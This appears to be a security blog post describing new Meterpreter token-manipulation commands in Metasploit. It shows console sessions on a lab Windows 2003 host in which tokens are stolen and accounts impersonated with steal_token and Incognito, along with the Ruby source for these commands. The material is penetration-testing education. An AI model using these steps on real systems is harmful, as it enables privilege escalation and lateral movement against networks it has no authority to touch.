Content

Meterpreter Token Manipulation

In revision 8055 HD committed new code that now allows the Meterpreter session if running as System to manipulate tokens in a much easier manner. Just like with incognito one can now get an access token and impersonate an account thru the Meterpreter Standard API, in fact I see both as complementing each other. Lets impersonate the Local Admin account on a Windows 2003 System using Incognito:

  1: meterpreter > use incognito
  2: Loading extension incognito...success.
  3: meterpreter > list_tokens -u
  4:
  5: Delegation Tokens Available
  6: ========================================
  7: NT AUTHORITYLOCAL SERVICE
  8: NT AUTHORITYNETWORK SERVICE
  9: NT AUTHORITYSYSTEM
 10: WIN2K3LAB01Administrator
 11:
 12: Impersonation Tokens Available
 13: ========================================
 14: NT AUTHORITYANONYMOUS LOGON

From line 1 and 2 we can see that we have loaded the incognito extension, this will inject a DLL in to the process where Meterpreter is running to allow us to issue the commands. At line 3 we issue a command to list the tokens available to the attacker, System is the best privilege to have while executing this command since we will see all token on the host, if we are not running as System on the target machine we will only see those tokens that the account have used to connect to other systems with.  Now we will change from our current running User ID to the Local Admin using incognito:

  1: meterpreter > getuid
  2: Server username: NT AUTHORITYSYSTEM
  3: meterpreter > impersonate_token WIN2K3LAB01\Administrator
  4: [+] Delegation token available
  5: [+] Successfully impersonated user WIN2K3LAB01Administrator
  6: meterpreter > getuid
  7: Server username: WIN2K3LAB01Administrator

Now we have moved from System to Local Admin, this process is very useful for when attacking distributed system like Microsoft Active Directory where having local access only is not of great benefit but being able to move to the credentials for that system specially administrative credentials are of great value.

The new commands in Standard API are:

  • drop_token    It drops any token being impersonated..
  • getprivs      Gets as many system privileges as it can.
  • steal_token  Attempts to steal a token from a given process and impersonate such token.
  •  

    The following code map to the following code in lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

      1: #
    
      2: # Obtains as many privileges as possible on the target machine.
    
      3: #
    
      4: def cmd_getprivs(*args)
    
      5: 	print_line("=" * 60)
    
      6: 	print_line("Enabled Process Privileges")
    
      7: 	print_line("=" * 60)
    
      8: 	client.sys.config.getprivs.each do |priv|
    
      9: 		print_line("  #{priv}")
    
     10: 	end
    
     11: 	print_line("")
    
     12: end
    
     13:
    
     14: #
    
     15: # Tries to steal the primary token from the target process.
    
     16: #
    
     17:
    
     18: def cmd_steal_token(*args)
    
     19: 	if(args.length != 1 or args[0] == "-h")
    
     20: 		print_error("Usage: steal_token [pid]")
    
     21: 		return
    
     22: 	end
    
     23: 	print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
    
     24: end
    
     25:
    
     26: #
    
     27: # Drops any assumed token.
    
     28: #
    
     29:
    
     30: def cmd_drop_token(*args)
    
     31: 	print_line("Relinquished token, now running as: " + client.sys.config.drop_token())
    
     32: end

    The drop_token command executes the function cmd_drop_token that as it can be seen in line 31 it will execute the API call client.sys.config.drop_token. The getprivs command execute sthe cmd_getprivs function that in turn executes the client.sys.config.getprivs API call which returns an Array of all the privileges the current user has. The steal_token command executes the cmd_steal_token function that in turn executes the client.sys.config.steal_token API call taking as required argument the PID of the process from whom to steal the token from if possible. As it can be seen 3 simple API calls from inside a Meterpreter session is all it takes, this makes scripting this actions for other scripts extremely easy and sets this framework apart from others.

    Lets Impersonate a toke that we know runs under the Administrators Account like the process of explorer.exe for a logged on account. We will list the processes, steal its token, check our privileges and then drop the token.:

      1: meterpreter > ps
    
      2:
    
      3: Process list
    
      4: ============
    
      5:
    
      6:     PID   Name                 Path
    
      7:     ---   ----                 ----
    
      8:     268   smss.exe             SystemRootSystem32smss.exe
    
      9:     320   csrss.exe            ??C:WINDOWSsystem32csrss.exe
    
     10:     344   winlogon.exe         ??C:WINDOWSsystem32winlogon.exe
    
     11:     392   services.exe         C:WINDOWSsystem32services.exe
    
     12:     404   lsass.exe            C:WINDOWSsystem32lsass.exe
    
     13:     600   vmacthlp.exe         C:Program FilesVMwareVMware Toolsvmacthlp.exe
    
     14:     620   svchost.exe          C:WINDOWSsystem32svchost.exe
    
     15:     700   svchost.exe          C:WINDOWSsystem32svchost.exe
    
     16:     756   svchost.exe          C:WINDOWSsystem32svchost.exe
    
     17:     784   svchost.exe          C:WINDOWSsystem32svchost.exe
    
     18:     820   svchost.exe          C:WINDOWSSystem32svchost.exe
    
     19:     964   spoolsv.exe          C:WINDOWSsystem32spoolsv.exe
    
     20:     992   msdtc.exe            C:WINDOWSsystem32msdtc.exe
    
     21:     1104  dns.exe              C:WINDOWSSystem32dns.exe
    
     22:     1152  svchost.exe          C:WINDOWSSystem32svchost.exe
    
     23:     1216  svchost.exe          C:WINDOWSsystem32svchost.exe
    
     24:     1296  vmtoolsd.exe         C:Program FilesVMwareVMware Toolsvmtoolsd.exe
    
     25:     1368  VMUpgradeHelper.exe  C:Program FilesVMwareVMware ToolsVMUpgradeHelper.exe
    
     26:     1488  wmiprvse.exe         C:WINDOWSsystem32wbemwmiprvse.exe
    
     27:     1560  svchost.exe          C:WINDOWSSystem32svchost.exe
    
     28:     1704  dllhost.exe          C:WINDOWSsystem32dllhost.exe
    
     29:     2164  Explorer.EXE         C:WINDOWSExplorer.EXE
    
     30:     2228  VMwareTray.exe       C:Program FilesVMwareVMware ToolsVMwareTray.exe
    
     31:     2236  VMwareUser.exe       C:Program FilesVMwareVMware ToolsVMwareUser.exe
    
     32:     2284  meter_224.exe        C:Documents and SettingsAdministratorDesktopmeter_224.exe
    
     33:     2352  wuauclt.exe          C:WINDOWSsystem32wuauclt.exe
    
     34:     2484  wmiprvse.exe         C:WINDOWSsystem32wbemwmiprvse.exe
    
     35:     3076  svhost77.exe         C:DOCUME~1ADMINI~1LOCALS~1Tempsvhost77.exe
    
     36:     3096  taskmgr.exe          C:WINDOWSsystem32taskmgr.exe
    
     37: meterpreter > steal_token 2164
    
     38: Stolen token with username: WIN2K3LAB01Administrator
    
     39: meterpreter > getuid
    
     40: Server username: WIN2K3LAB01Administrator
    
     41: meterpreter > drop_token
    
     42: Relinquished token, now running as: NT AUTHORITYSYSTEM
    

    We first executed the ps command to list all processes with the PID, we used the steal_token command in like 37 to steal the token for the explorer process that has the PID of 2164 and we confirm in line 39 with the getuid command that we are now running under that token, at line 41 we drop the token and return to run as System. The drop command is also useful for when impersonating a token using incongnito and we want to return.

    The getprivs command will list all of the Windows System Process Level Privileges that are enabled:

      1: meterpreter > getprivs
    
      2: ============================================================
    
      3: Enabled Process Privileges
    
      4: ============================================================
    
      5:   SeDebugPrivilege
    
      6:   SeTcbPrivilege
    
      7:   SeAssignPrimaryTokenPrivilege
    
      8:   SeLockMemoryPrivilege
    
      9:   SeIncreaseQuotaPrivilege
    
     10:   SeSecurityPrivilege
    
     11:   SeTakeOwnershipPrivilege
    
     12:   SeLoadDriverPrivilege
    
     13:   SeSystemtimePrivilege
    
     14:   SeProfileSingleProcessPrivilege
    
     15:   SeIncreaseBasePriorityPrivilege
    
     16:   SeCreatePagefilePrivilege
    
     17:   SeCreatePermanentPrivilege
    
     18:   SeBackupPrivilege
    
     19:   SeRestorePrivilege
    
     20:   SeShutdownPrivilege
    
     21:   SeAuditPrivilege
    
     22:   SeSystemEnvironmentPrivilege
    
     23:   SeChangeNotifyPrivilege
    
     24:   SeUndockPrivilege
    
     25:   SeManageVolumePrivilege
    

    As it can be seen the improvements on the Meterpreter ar being expanded and making it the best payload to be used against Windows System available in Metasploit. This new combination of token handling mixed with incognito and the ease in whish it can be scripted expands on the flexibility of Meterpreter and what can be done with it.

    Note:

    During the writing of this blog post the ps command was improved, it will now show under what privilege a process is running making the new set of commands even more useful

      1: meterpreter > ps
    
      2:
    
      3: Process list
    
      4: ============
    
      5:
    
      6:     PID   Name                 Path                                                      User
    
      7:     ---   ----                 ----                                                      ----
    
      8:     268   smss.exe             SystemRootSystem32smss.exe                             NT AUTHORITYSYSTEM
    
      9:     300   svhost77.exe         C:DOCUME~1ADMINI~1LOCALS~1Tempsvhost77.exe           NT AUTHORITYSYSTEM
    
     10:     320   csrss.exe            ??C:WINDOWSsystem32csrss.exe                         NT AUTHORITYSYSTEM
    
     11:     344   winlogon.exe         ??C:WINDOWSsystem32winlogon.exe                      NT AUTHORITYSYSTEM
    
     12:     392   services.exe         C:WINDOWSsystem32services.exe                          NT AUTHORITYSYSTEM
    
     13:     404   lsass.exe            C:WINDOWSsystem32lsass.exe                             NT AUTHORITYSYSTEM
    
     14:     600   vmacthlp.exe         C:Program FilesVMwareVMware Toolsvmacthlp.exe         NT AUTHORITYSYSTEM
    
     15:     620   svchost.exe          C:WINDOWSsystem32svchost.exe                           NT AUTHORITYSYSTEM
    
     16:     700   svchost.exe          C:WINDOWSsystem32svchost.exe                           NT AUTHORITYNETWORK SERVICE
    
     17:     756   svchost.exe          C:WINDOWSsystem32svchost.exe                           NT AUTHORITYNETWORK SERVICE
    
     18:     784   svchost.exe          C:WINDOWSsystem32svchost.exe                           NT AUTHORITYLOCAL SERVICE
    
     19:     820   svchost.exe          C:WINDOWSSystem32svchost.exe                           NT AUTHORITYSYSTEM
    
     20:     964   spoolsv.exe          C:WINDOWSsystem32spoolsv.exe                           NT AUTHORITYSYSTEM
    
     21:     992   msdtc.exe            C:WINDOWSsystem32msdtc.exe                             NT AUTHORITYNETWORK SERVICE
    
     22:     1104  dns.exe              C:WINDOWSSystem32dns.exe                               NT AUTHORITYSYSTEM
    
     23:     1152  svchost.exe          C:WINDOWSSystem32svchost.exe                           NT AUTHORITYSYSTEM
    
     24:     1216  svchost.exe          C:WINDOWSsystem32svchost.exe                           NT AUTHORITYLOCAL SERVICE
    
     25:     1296  vmtoolsd.exe         C:Program FilesVMwareVMware Toolsvmtoolsd.exe         NT AUTHORITYSYSTEM
    
     26:     1368  VMUpgradeHelper.exe  C:Program FilesVMwareVMware ToolsVMUpgradeHelper.exe  NT AUTHORITYSYSTEM
    
     27:     1560  svchost.exe          C:WINDOWSSystem32svchost.exe                           NT AUTHORITYSYSTEM
    
     28:     1704  dllhost.exe          C:WINDOWSsystem32dllhost.exe                           NT AUTHORITYSYSTEM
    
     29:     2164  Explorer.EXE         C:WINDOWSExplorer.EXE                                   WIN2K3LAB01Administrator
    
     30:     2228  VMwareTray.exe       C:Program FilesVMwareVMware ToolsVMwareTray.exe       WIN2K3LAB01Administrator
    
     31:     2236  VMwareUser.exe       C:Program FilesVMwareVMware ToolsVMwareUser.exe       WIN2K3LAB01Administrator
    
     32:     2352  wuauclt.exe          C:WINDOWSsystem32wuauclt.exe                           WIN2K3LAB01Administrator
    
     33:     2484  wmiprvse.exe         C:WINDOWSsystem32wbemwmiprvse.exe                     NT AUTHORITYSYSTEM
    
     34:     3096  taskmgr.exe          C:WINDOWSsystem32taskmgr.exe                           WIN2K3LAB01Administrator
    
     35:
    
     36: meterpreter >

    Carlos Perez

    Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog www.darkoperator.com carries the tag line: “Shell Is Only The Beginning”.

    Get daily email updates

    SC Media's daily must-read of the most current and pressing daily news

    By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.